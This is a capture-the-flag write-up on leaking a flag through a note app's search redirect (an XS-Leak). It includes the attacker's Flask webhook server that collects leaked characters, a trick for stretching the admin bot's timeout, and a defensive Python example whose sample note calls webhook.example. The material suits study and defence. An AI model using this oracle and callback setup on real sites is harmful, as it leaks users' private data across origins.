In this challenge, we were given a note-creating app with a search feature that lets users search note content. A content-dependent search response is a classic place to look for XS-Leaks (cross-site leaks).
The source code for the search endpoint is given below.
To exploit it, we use the /search endpoint. It tells us whether any note contains a particular string: if one does, the server redirects to a note that contains HTML, which in turn makes the bot send a callback to our webhook server.
However, there was a timeout that limits how long the bot stays on the given URL.
await page2.goto(website, {
  waitUntil: 'networkidle0',
  timeout: 60000
}); // Opens page as logged user
But waitUntil: 'networkidle0' means the bot waits until there have been no network connections for at least 500 ms. So it is possible to load an image that keeps a connection open and delays the timeout.
from flask import Flask, request, render_template, session, redirect

app = Flask(__name__)

# Characters of the flag recovered so far, and the character currently being tested.
found = ""
letter = ""


@app.route("/")
def welcome():
    return render_template("index.html")


@app.route("/log")
def log():
    # Called before each search attempt with the candidate character in ?current=
    global found, letter
    letter = request.args.get("current", "")
    return found


@app.route("/webhook")
def webhook():
    # Hit only when the search matched and the bot was redirected to the note,
    # so the candidate character is confirmed and appended to the flag.
    global found, letter
    found = found + letter
    return found


@app.route("/progress")
def progress():
    global found
    return found


if __name__ == "__main__":
    app.run(host="0.0.0.0", debug=True, port=8085)
With the above exploit, whenever a note matches a substring of the flag, the bot gets redirected to the webhook server, confirming one more character.
There were many interesting solutions for this challenge, like abusing the redirect in the search with the fetch redirect limit. Solving this challenge was fun and I learnt a lot from it.
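For a defender's view of the same bug, here is an added example (not code from the challenge or the writeup) that models the search oracle described above in plain Python and shows how to remove it. It assumes three things that are not on the page: the note data is a constructed in-memory dictionary, the browser sends the Fetch Metadata header Sec-Fetch-Site (standard in current browsers), and responses are modelled as (status, headers, body) tuples rather than a real Flask app so that it runs offline.

```python
import html
from typing import Dict, List, Tuple

# Constructed sample data: one user with a harmless note, a "flag" note, and a
# note carrying the kind of callback HTML the writeup relies on.
NOTES: Dict[str, List[Dict[str, str]]] = {
    "alice": [
        {"id": "n1", "content": "shopping list: milk, eggs"},
        {"id": "n2", "content": "flag{constructed_sample_flag}"},
        {"id": "n3", "content": '<img src="https://webhook.example/cb">'},
    ],
}

Response = Tuple[int, Dict[str, str], str]  # (status, headers, body)


def search_vulnerable(user: str, query: str) -> Response:
    """The oracle from the writeup: redirect to the first note whose content
    contains `query`. Status and Location depend on user data, so a page on
    another site can tell "match" from "no match" one character at a time."""
    for note in NOTES.get(user, []):
        if query in note["content"]:
            return 302, {"Location": f"/note/{note['id']}"}, ""
    return 200, {"Content-Type": "text/html"}, "<p>No results</p>"


def is_cross_site(request_headers: Dict[str, str]) -> bool:
    """Fetch Metadata check. Sec-Fetch-Site is 'cross-site' when the request
    (including a top-level navigation, which still carries SameSite=Lax
    cookies) was initiated from another site, which is exactly the situation
    when the bot sits on the attacker's page. A missing header (old browser)
    is allowed, matching the usual fail-open resource isolation policy."""
    return request_headers.get("Sec-Fetch-Site", "") == "cross-site"


def search_hardened(user: str, query: str, request_headers: Dict[str, str]) -> Response:
    """Two changes close the oracle:
    1. cross-site requests get an identical 403 whether or not anything matches;
    2. same-site requests never redirect: results are rendered inline, so the
       status code and navigation target do not depend on the stored data."""
    if is_cross_site(request_headers):
        return 403, {"Content-Type": "text/plain"}, "cross-site requests are not allowed"
    matches = [n["id"] for n in NOTES.get(user, []) if query in n["content"]]
    body = "<ul>" + "".join(f"<li>{html.escape(i)}</li>" for i in matches) + "</ul>"
    return 200, {"Content-Type": "text/html"}, body


def render_note(user: str, note_id: str) -> Response:
    """Escape note content on output so a stored note cannot embed the <img>
    callback that the writeup uses to signal the webhook once the bot lands."""
    for note in NOTES.get(user, []):
        if note["id"] == note_id:
            return 200, {"Content-Type": "text/html"}, f"<pre>{html.escape(note['content'])}</pre>"
    return 404, {"Content-Type": "text/plain"}, "not found"


if __name__ == "__main__":
    cross = {"Sec-Fetch-Site": "cross-site"}
    for q in ("flag{", "flag{zzz"):
        print("vulnerable", q, search_vulnerable("alice", q)[:2])
        print("hardened  ", q, search_hardened("alice", q, cross)[:2])
    print(render_note("alice", "n3")[2])
```

The two hardened responses for a matching and a non-matching query are byte-for-byte identical when the request is cross-site, which is the property an XS-Leak needs to be absent; the output escaping in render_note is the independent fix for the callback HTML inside notes.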